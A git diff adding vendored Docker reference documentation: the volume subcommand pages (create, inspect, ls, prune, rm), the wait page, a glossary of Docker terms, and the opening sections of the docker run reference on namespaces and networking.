You create a volume and then configure the container to use it, for example: + +```bash +$ docker volume create hello +hello + +$ docker run -d -v hello:/world busybox ls /world +``` + +The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container. + +Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data. + +Volume names must be unique among drivers. This means you cannot use the same volume name with two different drivers. If you attempt this `docker` returns an error: + +``` +A volume named "hello" already exists with the "some-other" driver. Choose a different volume name. +``` + +If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error. + +## Driver specific options + +Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options: + +```bash +$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey +``` + +These options are passed directly to the volume driver. Options for +different volume drivers may do different things (or nothing at all). + +The built-in `local` driver on Windows does not support any options. + +The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html). + +For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000. 
+ +```bash +$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo +``` + +Another example that uses `btrfs`: + +```bash +$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo +``` + +Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`: + +```bash +$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo +``` + + +## Related information + +* [volume inspect](volume_inspect.md) +* [volume ls](volume_ls.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md new file mode 100644 index 0000000000..98e0ee5abf --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md @@ -0,0 +1,59 @@ +--- +title: "volume inspect" +description: "The volume inspect command description and usage" +keywords: "volume, inspect" +--- + + + +# volume inspect + +```markdown +Usage: docker volume inspect [OPTIONS] VOLUME [VOLUME...] + +Display detailed information on one or more volumes + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about a volume. By default, this command renders all results +in a JSON array. You can specify an alternate format to execute a +given template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. 
+ +Example output: + + $ docker volume create + 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + [ + { + "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data", + "Status": null + } + ] + + {% raw %} + $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data + {% endraw %} + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md new file mode 100644 index 0000000000..90ecef2abe --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md @@ -0,0 +1,183 @@ +--- +title: "volume ls" +description: "The volume ls command description and usage" +keywords: "volume, list" +--- + + + +# volume ls + +```markdown +Usage: docker volume ls [OPTIONS] + +List volumes + +Aliases: + ls, list + +Options: + -f, --filter value Provide filter values (e.g. 'dangling=true') (default []) + - dangling= a volume if referenced or not + - driver= a volume's driver name + - label= or label== + - name= a volume's name + --format string Pretty-print volumes using a Go template + --help Print usage + -q, --quiet Only display volume names +``` + +List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. 
Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + +```bash +$ docker volume create rosemary +rosemary +$docker volume create tyler +tyler +$ docker volume ls +DRIVER VOLUME NAME +local rosemary +local tyler +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* dangling (boolean - true or false, 0 or 1) +* driver (a volume driver's name) +* label (`label=` or `label==`) +* name (a volume's name) + +### dangling + +The `dangling` filter matches on all volumes not referenced by any containers + +```bash +$ docker run -d -v tyler:/tmpwork busybox + +f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18 +$ docker volume ls -f dangling=true +DRIVER VOLUME NAME +local rosemary +``` + +### driver + +The `driver` filter matches on all or part of a volume's driver name. + +The following filter matches all volumes with a driver name containing the `local` string. + +```bash +$ docker volume ls -f driver=local + +DRIVER VOLUME NAME +local rosemary +local tyler +``` + +#### Label + +The `label` filter matches volumes based on the presence of a `label` alone or +a `label` and a value. + +First, let's create some volumes to illustrate this; + +```bash +$ docker volume create the-doctor --label is-timelord=yes +the-doctor +$ docker volume create daleks --label is-timelord=no +daleks +``` + +The following example filter matches volumes with the `is-timelord` label +regardless of its value. + +```bash +$ docker volume ls --filter label=is-timelord + +DRIVER VOLUME NAME +local daleks +local the-doctor +``` + +As can be seen in the above example, both volumes with `is-timelord=yes`, and +`is-timelord=no` are returned. 
+ +Filtering on both `key` *and* `value` of the label, produces the expected result: + +```bash +$ docker volume ls --filter label=is-timelord=yes + +DRIVER VOLUME NAME +local the-doctor +``` + +Specifying multiple label filters produces an "and" search; all conditions +should be met: + +```bash +$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no + +DRIVER VOLUME NAME +``` + +### name + +The `name` filter matches on all or part of a volume's name. + +The following filter matches all volumes with a name containing the `rose` string. + + $ docker volume ls -f name=rose + DRIVER VOLUME NAME + local rosemary + +## Formatting + +The formatting options (`--format`) pretty-prints volumes output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +--------------|------------------------------------------------------------------------------------------ +`.Name` | Volume name +`.Driver` | Volume driver +`.Scope` | Volume scope (local, global) +`.Mountpoint` | Path on the host where the volume is mounted. +`.Labels` | All labels assigned to the volume. +`.Label` | Value of a specific label for this volume. For example `{{.Label "project.version"}}` + +When using the `--format` option, the `volume ls` command will either +output the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. 
+ +The following example uses a template without headers and outputs the +`Name` and `Driver` entries separated by a colon for all volumes: + +```bash +$ docker volume ls --format "{{.Name}}: {{.Driver}}" +vol1: local +vol2: local +vol3: local +``` + +## Related information + +* [volume create](volume_create.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md new file mode 100644 index 0000000000..d910a49cdc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md @@ -0,0 +1,54 @@ +--- +title: "volume prune" +description: "Remove unused volumes" +keywords: "volume, prune, delete" +--- + + + +# volume prune + +```markdown +Usage: docker volume prune [OPTIONS] + +Remove all unused volumes + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused volumes. Unused volumes are those which are not referenced by any containers + +Example output: + +```bash +$ docker volume prune +WARNING! This will remove all volumes not used by at least one container. +Are you sure you want to continue? 
[y/N] y +Deleted Volumes: +07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e +my-named-vol + +Total reclaimed space: 36 B +``` + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md new file mode 100644 index 0000000000..1bf9dba220 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md @@ -0,0 +1,42 @@ +--- +title: "volume rm" +description: "the volume rm command description and usage" +keywords: "volume, rm" +--- + + + +# volume rm + +```markdown +Usage: docker volume rm [OPTIONS] VOLUME [VOLUME...] + +Remove one or more volumes + +Aliases: + rm, remove + +Options: + -f, --force Force the removal of one or more volumes + --help Print usage +``` + +Remove one or more volumes. You cannot remove a volume that is in use by a container. 
+ + $ docker volume rm hello + hello + +## Related information + +* [volume create](volume_create.md) +* [volume inspect](volume_inspect.md) +* [volume ls](volume_ls.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md new file mode 100644 index 0000000000..a07b82b071 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md @@ -0,0 +1,25 @@ +--- +title: "wait" +description: "The wait command description and usage" +keywords: "container, stop, wait" +--- + + + +# wait + +```markdown +Usage: docker wait CONTAINER [CONTAINER...] + +Block until one or more containers stop, then print their exit codes + +Options: + --help Print usage +``` diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md new file mode 100644 index 0000000000..0bc39a2023 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/glossary.md @@ -0,0 +1,286 @@ +--- +title: "Docker Glossary" +description: "Glossary of terms used around Docker" +keywords: "glossary, docker, terms, definitions" +--- + + + +# Glossary + +A list of terms used around the Docker project. + +## aufs + +aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that +Docker supports as a storage backend. It implements the +[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems. + +## base image + +An image that has no parent is a **base image**. + +## boot2docker + +[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made +specifically to run Docker containers. The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox. 
+ +## btrfs + +btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker +supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) +filesystem. + +## build + +build is the process of building Docker images using a [Dockerfile](#dockerfile). +The build uses a Dockerfile and a "context". The context is the set of files in the +directory in which the image is built. + +## cgroups + +cgroups is a Linux kernel feature that limits, accounts for, and isolates +the resource usage (CPU, memory, disk I/O, network, etc.) of a collection +of processes. Docker relies on cgroups to control and isolate resource limits. + +*Also known as : control groups* + +## Compose + +[Compose](https://github.com/docker/compose) is a tool for defining and +running complex applications with Docker. With compose, you define a +multi-container application in a single file, then spin your +application up in a single command which does everything that needs to +be done to get it running. + +*Also known as : docker-compose, fig* + +## container + +A container is a runtime instance of a [docker image](#image). + +A Docker container consists of + +- A Docker image +- Execution environment +- A standard set of instructions + +The concept is borrowed from Shipping Containers, which define a standard to ship +goods globally. Docker defines a standard to ship software. + +## data volume + +A data volume is a specially-designated directory within one or more containers +that bypasses the Union File System. Data volumes are designed to persist data, +independent of the container's life cycle. Docker therefore never automatically +deletes volumes when you remove a container, nor will it "garbage collect" +volumes that are no longer referenced by a container. 
+ + +## Docker + +The term Docker can refer to + +- The Docker project as a whole, which is a platform for developers and sysadmins to +develop, ship, and run applications +- The docker daemon process running on the host which manages images and containers + + +## Docker Hub + +The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with +Docker and its components. It provides the following services: + +- Docker image hosting +- User authentication +- Automated image builds and work-flow tools such as build triggers and web hooks +- Integration with GitHub and Bitbucket + + +## Dockerfile + +A Dockerfile is a text document that contains all the commands you would +normally execute manually in order to build a Docker image. Docker can +build images automatically by reading the instructions from a Dockerfile. + +## filesystem + +A file system is the method an operating system uses to name files +and assign them locations for efficient storage and retrieval. + +Examples : + +- Linux : ext4, aufs, btrfs, zfs +- Windows : NTFS +- macOS : HFS+ + +## image + +Docker images are the basis of [containers](#container). An Image is an +ordered collection of root filesystem changes and the corresponding +execution parameters for use within a container runtime. An image typically +contains a union of layered filesystems stacked on top of each other. An image +does not have state and it never changes. + +## libcontainer + +libcontainer provides a native Go implementation for creating containers with +namespaces, cgroups, capabilities, and filesystem access controls. It allows +you to manage the lifecycle of the container performing additional operations +after the container is created. + +## libnetwork + +libnetwork provides a native Go implementation for creating and managing container +network namespaces and other network resources. It manages the networking lifecycle +of the container performing additional operations after the container is created. 
+ +## link + +links provide a legacy interface to connect Docker containers running on the +same host to each other without exposing the hosts' network ports. Use the +Docker networks feature instead. + +## Machine + +[Machine](https://github.com/docker/machine) is a Docker tool which +makes it really easy to create Docker hosts on your computer, on +cloud providers and inside your own data center. It creates servers, +installs Docker on them, then configures the Docker client to talk to them. + +*Also known as : docker-machine* + +## node + +A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual +machine running an instance of the Docker Engine in swarm mode. + +**Manager nodes** perform swarm management and orchestration duties. By default +manager nodes are also worker nodes. + +**Worker nodes** execute tasks. + +## overlay network driver + +Overlay network driver provides out of the box multi-host network connectivity +for docker containers in a cluster. + +## overlay storage driver + +OverlayFS is a [filesystem](#filesystem) service for Linux which implements a +[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems. +It is supported by the Docker daemon as a storage driver. + +## registry + +A Registry is a hosted service containing [repositories](#repository) of [images](#image) +which responds to the Registry API. + +The default registry can be accessed using a browser at [Docker Hub](#docker-hub) +or using the `docker search` command. + +## repository + +A repository is a set of Docker images. A repository can be shared by pushing it +to a [registry](#registry) server. The different images in the repository can be +labeled using [tags](#tag). 
+ +Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/) +and its [tags](https://hub.docker.com/r/library/nginx/tags/) + + +## service + +A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how +you want to run your application containers in a swarm. At the most basic level +a service defines which container image to run in the swarm and which commands +to run in the container. For orchestration purposes, the service defines the +"desired state", meaning how many containers to run as tasks and constraints for +deploying the containers. + +Frequently a service is a microservice within the context of some larger +application. Examples of services might include an HTTP server, a database, or +any other type of executable program that you wish to run in a distributed +environment. + +## service discovery + +Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component +internal to the swarm that automatically assigns each service on an overlay +network in the swarm a VIP and DNS entry. Containers on the network share DNS +mappings for the service via gossip so any container on the network can access +the service via its service name. + +You don’t need to expose service-specific ports to make the service available to +other services on the same overlay network. The swarm’s internal load balancer +automatically distributes requests to the service VIP among the active tasks. + +## swarm + +A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode). + +## Docker Swarm + +Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine. + +Docker Swarm is the name of a standalone native clustering tool for Docker. 
+Docker Swarm pools together several Docker hosts and exposes them as a single +virtual Docker host. It serves the standard Docker API, so any tool that already +works with Docker can now transparently scale up to multiple hosts. + +*Also known as : docker-swarm* + +## swarm mode + +[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration +features embedded in Docker Engine. When you initialize a new swarm (cluster) or +join nodes to a swarm, the Docker Engine runs in swarm mode. + +## tag + +A tag is a label applied to a Docker image in a [repository](#repository). +tags are how various images in a repository are distinguished from each other. + +*Note : This label is not related to the key=value labels set for docker daemon* + +## task + +A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the +atomic unit of scheduling within a swarm. A task carries a Docker container and +the commands to run inside the container. Manager nodes assign tasks to worker +nodes according to the number of replicas set in the service scale. + +The diagram below illustrates the relationship of services to tasks and +containers. + +![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png) + +## Toolbox + +Docker Toolbox is the installer for Mac and Windows users. + + +## Union file system + +Union file systems, or UnionFS, are file systems that operate by creating layers, making them +very lightweight and fast. Docker uses union file systems to provide the building +blocks for containers. + + +## virtual machine + +A virtual machine is a program that emulates a complete computer and imitates dedicated hardware. +It shares physical hardware resources with other users but isolates the operating system. The +end user has the same experience on a Virtual Machine as they would have on dedicated hardware. 
+ +Compared to containers, a virtual machine is heavier to run, provides more isolation, +gets its own set of resources and does minimal sharing. + +*Also known as : VM* diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md new file mode 100644 index 0000000000..f24c342dfc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/index.md @@ -0,0 +1,21 @@ +--- +title: "Engine reference" +description: "Docker Engine reference" +keywords: "Engine" +--- + + + +# Engine reference + +* [Dockerfile reference](builder.md) +* [Docker run reference](run.md) +* [Command line reference](commandline/index.md) +* [API Reference](https://docs.docker.com/engine/api/) diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md new file mode 100644 index 0000000000..73769ed610 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/run.md @@ -0,0 +1,1555 @@ +--- +title: "Docker run reference" +description: "Configure containers at runtime" +keywords: "docker, run, configure, runtime" +--- + + + +# Docker run reference + +Docker runs processes in isolated containers. A container is a process +which runs on a host. The host may be local or remote. When an operator +executes `docker run`, the container process that runs is isolated in +that it has its own file system, its own networking, and its own +isolated process tree separate from the host. + +This page details how to use the `docker run` command to define the +container's resources at runtime. + +## General form + +The basic `docker run` command takes this form: + + $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] + +The `docker run` command must specify an [*IMAGE*](glossary.md#image) +to derive the container from. 
An image developer can define image +defaults related to: + + * detached or foreground running + * container identification + * network settings + * runtime constraints on CPU and memory + +With the `docker run [OPTIONS]` an operator can add to or override the +image defaults set by a developer. And, additionally, operators can +override nearly all the defaults set by the Docker runtime itself. The +operator's ability to override image and Docker runtime defaults is why +[*run*](commandline/run.md) has more options than any +other `docker` command. + +To learn how to interpret the types of `[OPTIONS]`, see [*Option +types*](commandline/cli.md#option-types). + +> **Note**: Depending on your Docker system configuration, you may be +> required to preface the `docker run` command with `sudo`. To avoid +> having to use `sudo` with the `docker` command, your system +> administrator can create a Unix group called `docker` and add users to +> it. For more information about this configuration, refer to the Docker +> installation documentation for your operating system. + + +## Operator exclusive options + +Only the operator (the person executing `docker run`) can set the +following options. 
+ + - [Detached vs foreground](#detached-vs-foreground) + - [Detached (-d)](#detached--d) + - [Foreground](#foreground) + - [Container identification](#container-identification) + - [Name (--name)](#name---name) + - [PID equivalent](#pid-equivalent) + - [IPC settings (--ipc)](#ipc-settings---ipc) + - [Network settings](#network-settings) + - [Restart policies (--restart)](#restart-policies---restart) + - [Clean up (--rm)](#clean-up---rm) + - [Runtime constraints on resources](#runtime-constraints-on-resources) + - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities) + +## Detached vs foreground + +When starting a Docker container, you must first decide if you want to +run the container in the background in a "detached" mode or in the +default foreground mode: + + -d=false: Detached mode: Run container in the background, print new container id + +### Detached (-d) + +To start a container in detached mode, you use `-d=true` or just `-d` option. By +design, containers started in detached mode exit when the root process used to +run the container exits. A container in detached mode cannot be automatically +removed when it stops, this means you cannot use the `--rm` option with `-d` option. + +Do not pass a `service x start` command to a detached container. For example, this +command attempts to start the `nginx` service. + + $ docker run -d -p 80:80 my_image service nginx start + +This succeeds in starting the `nginx` service inside the container. However, it +fails the detached container paradigm in that, the root process (`service nginx +start`) returns and the detached container stops as designed. As a result, the +`nginx` service is started but could not be used. Instead, to start a process +such as the `nginx` web server do the following: + + $ docker run -d -p 80:80 my_image nginx -g 'daemon off;' + +To do input/output with a detached container use network connections or shared +volumes. 
These are required because the container is no longer listening to the +command line where `docker run` was run. + +To reattach to a detached container, use `docker` +[*attach*](commandline/attach.md) command. + +### Foreground + +In foreground mode (the default when `-d` is not specified), `docker +run` can start the process in the container and attach the console to +the process's standard input, output, and standard error. It can even +pretend to be a TTY (this is what most command line executables expect) +and pass along signals. All of that is configurable: + + -a=[] : Attach to `STDIN`, `STDOUT` and/or `STDERR` + -t : Allocate a pseudo-tty + --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only) + -i : Keep STDIN open even if not attached + +If you do not specify `-a` then Docker will [attach to both stdout and stderr +]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267). +You can specify to which of the three standard streams (`STDIN`, `STDOUT`, +`STDERR`) you'd like to connect instead, as in: + + $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash + +For interactive processes (like a shell), you must use `-i -t` together in +order to allocate a tty for the container process. `-i -t` is often written `-it` +as you'll see in later examples. Specifying `-t` is forbidden when the client +standard output is redirected or piped, such as in: + + $ echo test | docker run -i busybox cat + +>**Note**: A process running as PID 1 inside a container is treated +>specially by Linux: it ignores any signal with the default action. +>So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is +>coded to do so. 
+ +## Container identification + +### Name (--name) + +The operator can identify a container in three ways: + +| Identifier type | Example value | +| --------------------- | ------------------------------------------------------------------ | +| UUID long identifier | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" | +| UUID short identifier | "f78375b1c487" | +| Name | "evil_ptolemy" | + +The UUID identifiers come from the Docker daemon. If you do not assign a +container name with the `--name` option, then the daemon generates a random +string name for you. Defining a `name` can be a handy way to add meaning to a +container. If you specify a `name`, you can use it when referencing the +container within a Docker network. This works for both background and foreground +Docker containers. + +> **Note**: Containers on the default bridge network must be linked to +> communicate by name. + +### PID equivalent + +Finally, to help with automation, you can have Docker write the +container ID out to a file of your choosing. This is similar to how some +programs might write out their process ID to a file (you've seen them as +PID files): + + --cidfile="": Write the container ID to the file + +### Image[:tag] + +While not strictly a means of identifying a container, you can specify a version of an +image you'd like to run the container with by adding `image[:tag]` to the command. For +example, `docker run ubuntu:14.04`. + +### Image[@digest] + +Images using the v2 or later image format have a content-addressable identifier +called a digest. As long as the input used to generate the image is unchanged, +the digest value is predictable and referenceable. 
+ +The following example runs a container from the `alpine` image with the +`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest: + + $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date + +## PID settings (--pid) + + --pid="" : Set the PID (Process) Namespace mode for the container, + 'container:': joins another container's PID namespace + 'host': use the host's PID namespace inside the container + +By default, all containers have the PID namespace enabled. + +PID namespace provides separation of processes. The PID Namespace removes the +view of the system processes, and allows process ids to be reused including +pid 1. + +In certain cases you want your container to share the host's process namespace, +basically allowing processes within the container to see all of the processes +on the system. For example, you could build a container with debugging tools +like `strace` or `gdb`, but want to use these tools when debugging processes +within the container. + +### Example: run htop inside a container + +Create this Dockerfile: + +``` +FROM alpine:latest +RUN apk add --update htop && rm -rf /var/cache/apk/* +CMD ["htop"] +``` + +Build the Dockerfile and tag the image as `myhtop`: + +```bash +$ docker build -t myhtop . +``` + +Use the following command to run `htop` inside a container: + +``` +$ docker run -it --rm --pid=host myhtop +``` + +Joining another container's pid namespace can be used for debugging that container. 
+ +### Example + +Start a container running a redis server: + +```bash +$ docker run --name my-redis -d redis +``` + +Debug the redis container by running another container that has strace in it: + +```bash +$ docker run -it --pid=container:my-redis my_strace_docker_image bash +$ strace -p 1 +``` + +## UTS settings (--uts) + + --uts="" : Set the UTS namespace mode for the container, + 'host': use the host's UTS namespace inside the container + +The UTS namespace is for setting the hostname and the domain that is visible +to running processes in that namespace. By default, all containers, including +those with `--network=host`, have their own UTS namespace. The `host` setting will +result in the container using the same UTS namespace as the host. Note that +`--hostname` is invalid in `host` UTS mode. + +You may wish to share the UTS namespace with the host if you would like the +hostname of the container to change as the hostname of the host changes. A +more advanced use case would be changing the host's hostname from a container. + +## IPC settings (--ipc) + + --ipc="" : Set the IPC mode for the container, + 'container:': reuses another container's IPC namespace + 'host': use the host's IPC namespace inside the container + +By default, all containers have the IPC namespace enabled. + +IPC (POSIX/SysV IPC) namespace provides separation of named shared memory +segments, semaphores and message queues. + +Shared memory segments are used to accelerate inter-process communication at +memory speed, rather than through pipes or through the network stack. Shared +memory is commonly used by databases and custom-built (typically C/OpenMPI, +C++/using boost libraries) high performance applications for scientific +computing and financial services industries. If these types of applications +are broken into multiple containers, you might need to share the IPC mechanisms +of the containers. 
+ +## Network settings + + --dns=[] : Set custom dns servers for the container + --network="bridge" : Connect a container to a network + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --network-alias=[] : Add network-scoped alias for the container + --add-host="" : Add a line to /etc/hosts (host:IP) + --mac-address="" : Sets the container's Ethernet device's MAC address + --ip="" : Sets the container's Ethernet device's IPv4 address + --ip6="" : Sets the container's Ethernet device's IPv6 address + --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses + +By default, all containers have networking enabled and they can make any +outgoing connections. The operator can completely disable networking +with `docker run --network none` which disables all incoming and outgoing +networking. In cases like this, you would perform I/O through files or +`STDIN` and `STDOUT` only. + +Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking. + +Your container will use the same DNS servers as the host by default, but +you can override this with `--dns`. + +By default, the MAC address is generated using the IP address allocated to the +container. You can set the container's MAC address explicitly by providing a +MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be +aware that Docker does not check if manually specified MAC addresses are unique. + +Supported networks : + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NetworkDescription
none + No networking in the container. +
bridge (default) + Connect the container to the bridge via veth interfaces. +
host + Use the host's network stack inside the container. +
container:<name|id> + Use the network stack of another container, specified via + its name or id. +
NETWORK + Connects the container to a user created network (using docker network create command) +
+ +#### Network: none + +With the network set to `none` a container will not have +access to any external routes. The container will still have a +`loopback` interface enabled in the container but it does not have any +routes to external traffic. + +#### Network: bridge + +With the network set to `bridge` a container will use docker's +default networking setup. A bridge is set up on the host, commonly named +`docker0`, and a pair of `veth` interfaces will be created for the +container. One side of the `veth` pair will remain on the host attached +to the bridge while the other side of the pair will be placed inside the +container's namespaces in addition to the `loopback` interface. An IP +address will be allocated for containers on the bridge's network and +traffic will be routed through this bridge to the container. + +Containers can communicate via their IP addresses by default. To communicate by +name, they must be linked. + +#### Network: host + +With the network set to `host` a container will share the host's +network stack and all interfaces from the host will be available to the +container. The container's hostname will match the hostname on the host +system. Note that `--mac-address` is invalid in `host` netmode. Even in `host` +network mode a container has its own UTS namespace by default. As such +`--hostname` is allowed in `host` network mode and will only change the +hostname inside the container. +Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and +`--dns-option` options can be used in `host` network mode. These options update +`/etc/hosts` or `/etc/resolv.conf` inside the container. No changes are made to +`/etc/hosts` and `/etc/resolv.conf` on the host. + +Compared to the default `bridge` mode, the `host` mode gives *significantly* +better networking performance since it uses the host's native networking stack +whereas the bridge has to go through one level of virtualization through the +docker daemon. 
It is recommended to run containers in this mode when their +networking performance is critical, for example, a production Load Balancer +or a High Performance Web Server. + +> **Note**: `--network="host"` gives the container full access to local system +> services such as D-bus and is therefore considered insecure. + +#### Network: container + +With the network set to `container` a container will share the +network stack of another container. The other container's name must be +provided in the format of `--network container:`. Note that `--add-host` +`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are +invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are +also invalid in `container` netmode. + +Example running a Redis container with Redis binding to `localhost` then +running the `redis-cli` command and connecting to the Redis server over the +`localhost` interface. + + $ docker run -d --name redis example/redis --bind 127.0.0.1 + $ # use the redis container's network stack to access localhost + $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1 + +#### User-defined network + +You can create a network using a Docker network driver or an external network +driver plugin. You can connect multiple containers to the same network. Once +connected to a user-defined network, the containers can communicate easily using +only another container's IP address or name. + +For `overlay` networks or custom plugins that support multi-host connectivity, +containers connected to the same multi-host network but launched from different +Engines can also communicate in this way. 
